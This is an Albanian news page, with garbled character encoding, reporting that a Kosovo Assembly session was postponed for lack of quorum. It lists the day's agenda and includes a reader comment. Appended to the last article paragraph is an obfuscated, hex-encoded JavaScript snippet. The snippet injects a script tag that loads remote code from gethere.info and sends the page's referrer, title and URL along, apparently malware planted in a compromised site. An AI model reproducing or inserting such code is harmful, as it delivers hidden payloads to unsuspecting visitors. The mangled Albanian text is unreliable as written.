kuvendi_kosoves

DeputetA�t mungojnA� nA� seancA�

NA� mungesA� tA� kuorumit seanca e Kuvendit tA� KosovA�s A�shtA� shtyrA� pA�r ditA�n e hA�nA�. UdhA�heqA�si i seancA�s, Xhavit Haliti, ka thA�nA� se 20 minuta janA� pritur deputetA�t qA� vijnA� nA� seancA� dhe nuk kanA� ardhur dhe pA�r kA�tA� arsye shtyhet seanca.

a�?PritA�m 10 minuta akademikA�, nuk erdhA�n deputetA�t, tash u bA�nA� 20 minuta dhe prapA� nuk janA�. NA� mungesA� tA� kuorumit shtyhet seanca pA�r ditA�n e hA�nA� ora 11a�?, ka thA�nA� Haliti.

Pas njA� seance tA� gjatA� ditA�n e djeshme, ku ka qenA� si rend i ditA�s informimi i kryeministrit Hashim ThaA�i lidhur me takimin e tij me homologun serb Ivica DaA�iq, sot deputetA�t e Kuvendit tA� KosovA�s nA� shumicA� kanA� munguar nA� seancA�.

Ndryshe, nA� rend tA� ditA�s kanA� qenA� kA�to pika tA� rendit, si: shqyrtimi i parA� i Projektligjit pA�r kontrollin e duhanit, shqyrtimi i parA� i Projektligjit pA�r ekzekutimin e sanksioneve penale, shqyrtimi i parA� i Projektligjit pA�r sistemin e pagesave, shqyrtimi i parA� i Projektligjit pA�r zonat ekonomike dhe shqyrtimi i dytA� i Projektligjit pA�r regjistrimin e pengut nA� regjistA�r pA�r sendet e luajtshme, shkruan a�?Kosovapressa�?.

NdA�rkohA�, nA� rend tA� ditA�s ka qenA� edhe shqyrtimi i Raportit tA� Komisionit pA�r ShA�ndetA�si, PunA� dhe MirA�qenie Sociale pA�r mbikA�qyrjen e zbatimit tA� Ligjit tA� PunA�s, shqyrtimi i Rekomandimit tA� Komisionit ad hoc pA�r pA�rzgjedhjen e tre anA�tarA�ve nA� Bordin pA�r Ankesa tA� Mediave dhe formimi i Komisionit Ad-hoc pA�r pA�rzgjedhjen e anA�tarA�ve tA� Bordit tA� Radio-Televizionit tA� KosovA�s.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

  • vjollca

    pomos hupni koh as mos e mbani fare at mledhje se tek e fundit dihet ,Thaqi i shkreti qka kah mujt me bisedu me humologun e tij ,veq qka i kah pre rrobat Europa